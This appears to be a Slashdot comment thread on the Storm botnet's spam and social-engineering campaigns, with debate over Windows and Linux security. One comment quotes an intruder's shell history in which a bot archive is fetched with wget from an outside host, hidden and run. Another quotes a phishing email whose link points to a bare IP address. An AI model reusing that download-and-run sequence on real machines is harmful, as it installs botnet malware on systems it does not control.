Storm Botnet Is Behind Two New Attacks 226
We've gotten a number of submissions about the new tricks the massive Storm botnet has been up to. Estimates of the size of this botnet range from 250K-1M to 5M-10M compromised machines. Reader cottagetrees notes a writeup at Exploit Prevention Labs on a new social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video. The link is to a Storm-infected bot that attacks using the Q4Rollup exploit (a package of about a dozen encrypted exploits). And reader thefickler writes that the recent wave of "confirmation spam" is also due to Storm, as was the earlier, months-long "e-card from a friend" series of attack emails.
I had a 500% increase in Spam on Tuesday Last Week (Score:4, Interesting)
I fscking hate SPAM!
Re:I had a 500% increase in Spam on Tuesday Last W (Score:2)
Re:I had a 500% increase in Spam on Tuesday Last W (Score:2)
Neither blog provides proof, forensic details, or anything even remotely interesting to a geek seeking out "news for nerds." Just the bare necessary to make it look like it's a well-meaning tech link and not a scheme to inflate someone's page views.
All they are is a couple of paragraphs saying, "Hey, you know all those new spam messages you're getting? The
Re: (Score:2)
It is also a peer bonding thing, like "It burns when I pee." "Hey, it burns when I pee as well!"
Re:I had a 500% increase in Spam on Tuesday Last W (Score:2, Insightful)
Re: (Score:2, Funny)
Re:I had a 500% increase in Spam on Tuesday Last W (Score:3, Informative)
Skynet... (Score:3, Funny)
http://www.emhsoft.com/singularity/ [emhsoft.com]
YKIMS!
Brings up a point (Score:2)
Imagine if they put this botnet to a real use, like Seti@Home. They'd be uber-points people in no time.
But noooo, they have to be all evilly criminal types, don't they.
Re: (Score:2)
I thought about doing this for folding@home (cure cancer with a virus!), but once you get mondo points, someone's going to ask if you have _legitimate_ access to all those computers. Vijay likes to keep everything above board.
As for seti@home, I'd run it if it wasn't for the idea that I have that as communication gets more advanced, the less there is reliance on sending analogue electromagnetic waves hither and yon through the aether. SETI
Re: (Score:2)
Re: (Score:2)
How does the infection spread? (Score:2)
First they need to open the message. It should have gotten filtered into a junk folder (if not blocked altogether) so the user must be actually going through their junk mail folder and reading things. Who has time to waste on that?
Now, I'd assume noone will get infected just by opening the mail. They'd have to at the very least click on the link. Will clicking be enough to infect a computer? Does it depend on th
Re: (Score:2, Informative)
If that doesn't work, they usually bring up a page saying something like 'If you are seeing this message, please download our secure login software', along with a link.
I'm surprised they even try something as obvious as this, but I assume that
Re: (Score:2)
Neither SpamAssassin nor GMail's mail filters are nabbing a lot of this stuff at first. I've marked about 15 of them as spam on my website's GMail account and yet similar messages are *still* getting through. I can certainly understand how people are being infected in the first
Re:How does the infection spread? (Score:4, Insightful)
Many naive users would really want to see the e-card their friend has sent (even though it is never mentioned who that friend may be) so they click the link.
The next page explains they have to load some software. Not to unusual in the naive user's world. They visit websites all the time that tell them that they have to update their flash plugin, a codec, an active-x component, or whatever. They already click away those pop-ups that warn them before they have actually read them.
Besides, the first page explains that they have to click OK and go through the installation or they will not be able to see the card. Who would want to turn down their friend and not view an e-card sent to them?
So the trojan is downloaded and installed. No problem, because they are logged in as an administrator. Who sets up their system to use separate accounts for admin and use? Maybe 1% of users try that.
So, the naive user very easily gets infected. Mainly because in the past they have seen so many useless pop-ups warning them about potentially harmful things that others have told them they should click away (like getting a warning when you delete something). A pop-up no longer is an alerting event that requires attention, it is just a stupid window that gets in the way of your "internet experience".
Furthermore, most users are not prepared to think about security or to take extra steps to secure their systems (like using a separate account for software installation and system maintenance).
Re:How does the infection spread? (Score:4, Insightful)
Oh, and also because most of those warnings are really not useful for the user. They shove the responsibility on the one person least suited to actually make the call. "Hey, loser, W32kdrv.dll wants to access 0xf4a50cb to do CrypicThing() which could result in Lengthytechnobabblethatsoundsverymuchlikethenonse
Re: (Score:2)
Re: (Score:2)
Bottom line, if I tell my Mom to only use Firefox, is she protected against all of this?
Arggg! (Score:4, Insightful)
~Not AC cause I don't value my karma~
Re:Arggg! (Score:5, Insightful)
Linux in its default configuration has no open ports and can be installed safely without a firewall defending it. Can't say the same about many MS OSes. Certainly not Windows 9x, of which there's still a lot of copies running out there (and not supported anymore, thanks MS!)
Re: (Score:2)
I'd pick Option C: Millions of Windows 2000/XP boxes connected to cable/dsl.
Re: (Score:2)
A good deal of which have ISPs that block outgoing connections on port 25, which isn't a problem for servers.
Re: (Score:2)
Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that ocassionally comes online, or a big Linux/Solaris/whatever server on a DS3? Because while Linux may not be very popular as a desktop OS, it's certainly common as a server. And servers tend to have much better connections than a normal computer.
Servers are going to be more highly scrutinized. Where I work, we have multiple IDS watching the network, and bandwidth monitors that watch for spikes. If a host started using up any significant amount of our bandwidth, we'd know, and we'd shut it down. Not so for most home computers. Bot infections can last for years on home computers when the user doesn't know that there's something wrong, or that they need to fix something.
Linux in its default configuration has no open ports and can be installed safely without a firewall defending it. Can't say the same about many MS OSes. Certainly not Windows 9x, of which there's still a lot of copies running out there (and not supported anymore, thanks MS!)
Linux is a kernel. A distribution of Linux could easily have open ports, an
Re: (Score:2, Informative)
Gentoo FTW! (Score:2)
I set up an Ubuntu VPS recently because the service provider didn't offer Gentoo. In addition to sshd, the VPS already had Apache and Sendmail installed and running. There were some ports associated with VPS management that were open. I think Samba may have even been ins
Windows is inherently less secure (Score:5, Informative)
If that was the case, then why are Microsoft applications (like IIS) more often compromised than non-Microsoft applications even in areas where Microsoft is NOT dominant?
Windows is inherently less secure than most of the competition in a number of ways.
1. The Microsoft HTML control's use of ActiveX is inherently insecure and can not be fixed without breaking every application that uses the HTML control.
1a. This insecure design was deliberate and Microsoft fought the Justice Department to a standstill rather than change or replace it.
2. Windows requires a number of insecure services to run to perform routine operations.
2a. There is no way to force these services to be run local-only without using a firewall.
2b. This means that Windows Firewall has to be used to secure Windows to the same degree as a UNIX based system WITHOUT a firewall.
3. Windows document formats are still based on serialized COM objects. It's even possible for them to include serialized COM objects in XML files.
3a. Serialized COM objects can refer to or even contain insecure code that can be used for an attack.
The idea that any one of these three issues and theor consequent corollaries are accepted boggles my mind. The idea that they're defended by the claim that the only reason Windows is more often compromised is that it is more common...I can not conceive of the confusion in the mind that would lead to such a conclusion.
Re: (Score:3, Informative)
Re: (Score:3, Insightful)
1a. Back in the old "classic" Mac era the Mac went through a period where it was the prime target for attacks, despite it having a fraction of the market, simply because it had such a huge surface area to attack.
1b. Apple responded to many exploits (for example, in autorun CDs and floppies) by removing dangerous capabilities.
1c. Similarly, UNIX systems usually don't come with the "r" suite enabled or oft
Re: (Score:2)
Prior to using 2.0, 1.x totally disabled autoinsertion and autoplay (the normal behavior). I ran a Microsoft utility (Autoplay Repair Wizard) that verifies the sanity of autoplay registry and it re-enabled autoinsertion and autoplay (some inconsistencies were corrected [HKLM
Re: (Score:2)
Do some research and read about when Microsoft first started talking about ActiveX and the response of the industry at that time.
Hint: The response was unfavorable and mainly for security reasons.
Extra Credit: Name three Windows exploits that required no user interaction to be successful that existed within the last 5 years.
Re: (Score:2)
Interesting Question (Score:3, Interesting)
From my understanding there is no viral content in the message, so your virus scanner would have no reason to block the message. A Spam filtering company could well "pass the buck" and say that this is a virus problem, yes it's going to trigger on some spam rules, but "Where it's a virus problem, why create special rules for it"
I can see this type of attack becoming more popular in the future, at least until this question is solved.
Re: (Score:2)
If a message is trying to sell me "V1A afdsuiwre GRA", SpamAssassin takes care of it, and scores it to hell, and I never see it;
If a message is infected with Trojan.Dropper.C ClamD detects it, flags it as a virus, and I never see it.
(If anybody has the text of one of these, and they feel like posting it, that would be cool, 'cause I haven't gotten any... I feel so unloved, just like when the lovebug went around)
Yes the message falls und
Re: (Score:2)
Re: (Score:2)
Personally I think all of the e-card things (illegitimate, and otherwise) should all rot in hell. If I want to sell my e-mail address to spammers, that's my thing
Re: (Score:2)
Comment removed (Score:4, Funny)
Re:If only they could use the botnet for the good. (Score:2)
Re: (Score:2)
It's not just windows they're exploiting... (Score:5, Interesting)
root@zomg:~# cat
root@zomg:~# cat
ssh localhost
w
cat
cat
passwd
cd
ks
l
sl
ls
ls- all
ls -all
mkdir " "
cd " "
clear
wget imaginez0r.xhost.ro/botme.tar.gz
tar zxvf botme.tar.gz
rm -rf botme.tar.gz
cd
PATH=.:$PATH
bash
These kind of attacks happen every day, sometimes more than once a day. If you don't patch and secure your machine, or do stupid things like download and run binaries, it's gonna get owned. Doesn't matter what OS you run.
Re: (Score:3, Interesting)
Re:It's not just windows they're exploiting... (Score:5, Informative)
As far as xhost, You can get a free account [xhost.ro] too
Make sure you run logwatch and logrotate and md5 the logs when they rotate (and rotate frequently, like every minute). Then store the checksum somewhere innocent after rotating. Have logwatch automatically check the checksums on all existing logs and report on that also. hosts.deny everything but your own personal IP address (in hosts.allow) on all ports except those you need to do business. SSH ONLY, don't use telnet or other unencrypted connections. Don't allow root to connect from SSH. Don't allow su from ssh (if possible). Compile your own stuff (including your compiler), never run binaries. Use shadow passwords. Put all of your binaries on a read-only mounted partition, with
Most of this is duh stuff and easy to do, and you should have it written in your procedures for building a new box. I believe the NSA has some guidelines also.
was wondering about that (Score:2)
I don't normally get much spam - maybe one every other week, but I've gotten two of those lately
OMG, what are you doing man. This video of you is all over the net. go look at it... http://www.youtube.com/watch?v=lAC5mj7oew5 [youtube.com] (link goes to http://90.31.69.105/ [90.31.69.105])
and
LMAO, I cant believe you put this video online.
Idiot-proofing the ultimate tool (Score:5, Insightful)
You know, I can go and buy a microwave oven and plug it safely into a standardized outlet and not electrocute myself or blow up my house. I can even buy a propane tank and fire up my grill without risking my life too much. I can buy a modern automobile and feel confident that if I drive it into a tree at 30 MPH or roll it over, I still have a reasonable chance of surviving. Most things have built-in standardized safety features and/or safe failure modes (within reason).
These things I can buy are all tools, some with licensing or age restrictions attached, but all more-or-less idiot-proofed. The razor blades I bought recently to scrape paint off my windows even warned me that they were "razor sharp". Well duh.
But the most sophisticated, most powerful, most versatile, general purpose tool we humans have yet invented, the networked personal computer, has been sold to and is used by millions of people without any training whatsoever and without any warnings outside of what one might pick up from the "Dangers in Cyberspace" fluff segment on the local news.
People are using computers more and more to organize all of their critical financial information. A single security breach can have catastrophic, real consequences, if for example your identity is stolen and your credit is ruined after your bank accounts are drained overnight.
All you have to do is click on one really bad link. Sometimes, not even that.
This is just another example of how technology is changing human society in completely unpredictable ways. Back in the 80's, you might have worried about a virus wiping out your word processing file. Today, typing your username and password on an untrusted machine, even just once, can compromise your entire life, and ruin your future.
Re:Idiot-proofing the ultimate tool (Score:5, Insightful)
Extrapolating that I'm guessing that in a couple of decades the "I don't know what my computer does, so it's not my problem" defense is going to be as acceptable as "of course I ran over your daughter, I cannot drive a car at all".
Re: (Score:2)
Re: (Score:2)
I wonder what will happen if a bunch of insurance companies all got hit with suites going after home owner liability insurance payoffs. Would the insurance companies then got after MS or would they just force all insured home owners to run the latest version of their favorite corps bad anti-virus code?
Re: (Score:2)
I'm skeptical.
You can be skeptical for those that enter no personal data such as passwords, account numbers, and credit card info online, but for everyone else their future is ruined when their accounts are drained and even their identity stolen because a trojan forwarded their keystrokes to a Commie, excuse me, enterprising capitalist thriving in a socialist country.
rd
Re: (Score:2)
They'll replace thousands of dollars transferred from your account? There was a big writeup on this recently about how the funds were used to buy stuff and sent to a network of unsuspecting accomplices who were duped into shipping the contraband overseas.
At no point in the article did anyone s
Is there a point to this torture anymore? (Score:2)
Does Storm Only Attack Windows? (Score:5, Insightful)
Does it read slashdot? (Score:2)
Disconnect them (Score:2)
Post reasons why this is a bad idea here. I'm beginning to have difficulty understanding why so little action is being taken.
Re: (Score:2)
Re: (Score:2)
What? It's nowhere near a small step. It's a huge step to go from "let's get infected, unsecured spam factories off the Internet" to "let's destroy peer to peer". Spam botnets have nothing in common with P2P networks. Spamming is illegal under Federal law, P2P is not.
And "infected with Linux"?!? You sound like a Microsoft shill. Nobody gets "infected" with Linux, they install
New Global Holiday (Score:2)
Storm what? Yea, that's right, fuck you Storm, we just reformatted every computer connected to the internet today.
Yea I know, good luck getting everyone on board. I just wish it were possible because even though I don't know who operates these Botnets if I were to find out I would absolutely LOVE to kick them in the nuts.
Re: (Score:2)
The obvious solution is to just direct the botnets to recognize the first Reformat Day automatically.
Re: (Score:3, Interesting)
Remember grandma with the hacked computer is running software that is owned by Microsoft. She only licensed it and the owner is still to blame.
Comment removed (Score:5, Insightful)
Re:Ha! (Score:5, Insightful)
OK, since you used the word "keeps building", I assume this is about more like Vista than Windows 95.
But if a trojan in Vista asks you to elevate its privilegies (due to UAC) to run administrative tasks such as installing itself in the system, and the user clicks yes, what should happen instead? This would be equivalent to a Linux user getting an email telling he needs to run some shady software under root privilegies, and the user saying "yes please, do that now".
Re: (Score:2)
I haven't used Vista but I was under the impression that UAC is really broken because it's constantly spamming you with stupid questions to the
Re: (Score:2)
This is not flamebait. It was a true observation: people should not criticize Vista's UAC if they genuinely don't know anything about it. People who think UAC is overly obtrusive haven't used Vista enough: during the initial install phase, yes, you need to grant access fairly often. But that's no different than on any Linux machine. The problem is that most programs that have no business requiring root access (AIM?) require it for a successful in
Re: (Score:3, Insightful)
But the user is not a technical system. When you deal with users, you need to follow good user interface guidelines, not just technical, binary thinking. That's where MS - despite their money, years of experience, own research center and all - still produced a total failure. UAC is one of the worst abominations of user interface design ever. You can give an entire presentation on its shortcomings.
Re: (Score:2, Insightful)
Re: (Score:2)
Re: (Score:3, Informative)
Re: (Score:2)
I do agree that it's the user who is the security hole here, and that wouldn't change even if everyone was running unix rather than windows. Both those systems suffer from a basic design flaw that assumes that all processes should run
Re: (Score:2)
Re: (Score:2)
Re:Ha! (Score:4, Insightful)
Let's say that Windows was magically replaced by (say) Ubuntu installs tomorrow, all over the world, with the best known default configuration in terms of being secure. Within a day you'd have exploits, and rapidly growing botnets.
Ideally, *you* would then be ranting about the morons who wrote the kernel, the idiots who did the filtering and mail clients, the jerks who designed the network protocols, and the nincompoops who can't rub two curly braces together without creating a security hole.
Or you could do some research and realize that this stuff is just bloody hard to get right. By anyone. By people who have been doing this their entire careers.
Look, the security holes are *already there* on other platforms. Why aren't you ranting about them?
Meh.
Re:Ha! (Score:4, Interesting)
Well, one point in favour of Linux security is the central software repository for each and every distro.
Linux users typically will not - even when the popularity of Linux rises - install random cursors, free smilies and whatnot - simply because they'll be used to installing things from the repository.
And it's quite simple to hammer that into people's heads: the software from the repository is safe. Other software is not.
There is still nothing similar in the Windows world.
Re: (Score:2)
Re: (Score:2)
Fixed for . . . well, maybe nineteen years?
The technical term for someone who puts a *nix box on the net without the latest set of updates, patches, and good planning is "0wn3ed."
Re:Ha! (Score:5, Insightful)
We've found solutions; don't use shoddy software. The problem is all of the people who haven't switched yet.
Re: (Score:3, Insightful)
This happened with XP SP2, and it happens again with Vista.
Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they setup the Windows systems at their friends homes to do so, because "it would be too much of a hassle to use
Re:Ha! (Score:4, Funny)
You mean it is the evil linux haxors that deliberately sabotage poor Microsoft?
That is hilarious.
Re:Ha! (Score:5, Insightful)
You mean it is the evil linux haxors that deliberately sabotage poor Microsoft?
That is hilarious.
Even worse: it's the good-natured Linux users who try to find a balance between Joe User's wants and needs on the one hand, and their own patience and free time on the other.
I tried. I really tried securing my ex-gf's family computer. I opened accounts for everyone. I only left admin privileges on one account. Set everything up.
Everybody just used the admin account again. Not even the fact that each could have their own desktop didn't entice them to use their own accounts; instead, they had one desktop full of five people's crud.
Re: (Score:2)
Everybody just used the admin account again. Not even the fact that each could have their own desktop didn't entice them to use their own accounts; instead, they had one desktop full of five people's crud.
Did they end up just using the admin account because of loser applications that require administrative access to install, though? Or was it more psychological/force of habit to use the "better" account?
Windows apps need to start installing in user space by default. Installing into the "system" is such a pain in the ass.
Re:Ha! (Score:5, Insightful)
As long as the situation remains like this, there is little Microsoft can do.
(BTW, if you're writing a GUI application for Linux, maybe you should think about taking similar steps. We cannot preach to others if our own house is not in order.)
Re: (Score:2)
I'm sorry, but are you advocating that an ADMIN account should not be granted read/write access to things? Isn't that sort of the point of an admin account. Further destabalizing the OS is not a good solution to an unstable OS. I'm all for making things work better for the non-admin accounts, in order to allow more people to use them,
Re:Ha! (Score:5, Informative)
Re:Ha! (Score:5, Insightful)
Staroffice 3.x was a brilliant example. When you ran its setup as root it automatically went into global per-machine setup mode, while running it as Joe Average User made it run a workstation setup. In fact Office 6.x for Windows 95/NT behaved in a similar manner as well. If you ran it from a network install it behaved differently when run as admin vs when run as an average user.
I have no idea why developers stopped doing that. IMO, that was the right behaviour.
Re: (Score:2)
I am really bloody sick of Microsoft's shoddy work.
Agreed, but the other thing about this problem that really seems to burn all the sysadmins and network admins and IT geeks out here is that with all the amazing knowledge and problem solving abilities, no one has been able to devise an elegant solution to this problem.
Well, to use the GP's analogy, while the houses are still being built out of gasoline-soaked balsa wood, what can we do to stop fires? Disallow high temperatures?
Microsoft's operating systems are currently the main problem. Until Microsoft deploys a fundamentally more secure OS or people simply stop using Windows to any great extent, there is nothing we can do. Especially nothing elegant.
The only elegant solution that comes to mind, really, is OS X. But that's more of an elegant OS than an elegant solut
B.S. (Score:5, Insightful)
Ok, I call Bullshit.
1. Microsoft DID come out with this "more secure" OS. Like it or not, Vista is a major improvement. But it gets SLAMMED by the average
This is a tangent, but still to the point: MSFT is dammed if they do, dammed if they don't.
2. Linux/OSX/Whatever isn't perfect. BY FAR. Right now, the reward is SO GREAT for hacking on windows boxes. You only have to scale a 6 foot fence to gain access to multi-millions of users. In, say, linux, or OSX you have to scale a 9 foot fence to gain access to a fraction of that. Right now, cracking Windows just makes sense for crackers. But you (and others) seem to think that botnets would just go away forever if only Microsoft gets their act together. That's insane. People are getting RICH off botnets. You think they're just going to stop because the game got a bit tougher? No way... As the reward factor of Windows diffuses down to the level of the other mainstream OS's, you'll see they'll get attacked more, too.
3. Microsoft isn't going anywhere. This is the nature of the game, people! So sitting around here talking about "When everyone switches" or whatever is just silly. It's childish. You think you're part of the solution b/c you run an alternative OS? You're not. If you want to be part of the solution, start thinking about how to defeat these people in a way that doesn't involve bashing Windows.
Your approach is a LOT like saying "Terrorism won't be a problem once everyone switches to Christianity."
Re: (Score:3, Interesting)
2. If you think that UAC is "security by annoyance" than you are not
Re:Ha! (Score:4, Funny)
That's because there is no elegant solution to social eng. attacks. The extent of human ignorance is obscene.
I bet if I sent out some random crap exe to a bunch of people, which when opened it would popup a box that said, "h4ck.exe would like to steal your credit card numbers, shit in your bed, and screw your girlfriend. Would you like to continue?" Ok, or cancel. And some people STILL would click ok.
There are many solutions... (Score:2)
There are plenty of solutions. A new authenticated email protocol could be devised, a switchover date set (e.g. December 31st, 2007), and the world would be largely free of spam overnight. It would take far less effort then was expended for the Y2K problem.
Anybody who didn't update their server would have their mail sent through as before but with the word "[SMTP]" inserted i
Re: (Score:2)
Re: (Score:2)
You can't block the usual ports because a lot of people do their own email stuff (VERY technical term).
There's a lot of iffy stuff involved and no matter what's done a group of people will be pissed off.
Re: (Score:2)
Re: (Score:2)
Comment removed (Score:5, Insightful)
Re: (Score:2, Insightful)
Re:Ha! (Score:4, Informative)
this kind of hubris is what can make osx/linux/whatever a zombie just as fast as anything else out there.
i guess you never heard of the old sendmail worm, php-based exploits, etc etc
if you do no work to insure your OS is as tight as necessary, regardless of what that OS is, you will leave yourself open to being improperly utilized as a system.
-r
Re: (Score:2)
Re: (Score:2, Funny)
Re:Thank you Microsoft (Score:5, Funny)
I'm not sure which is worse: unpatched Windows machines, or Linux boxes without the critical patch that allows fanboys to type the word "you're."
Re:Thank you Microsoft (Score:4, Funny)
Re: (Score:2, Insightful)
On the other end, 10 million could possibly take out a entire ISP, and I'm talking about a backbone ISP too. THAT'S terrifying stuff.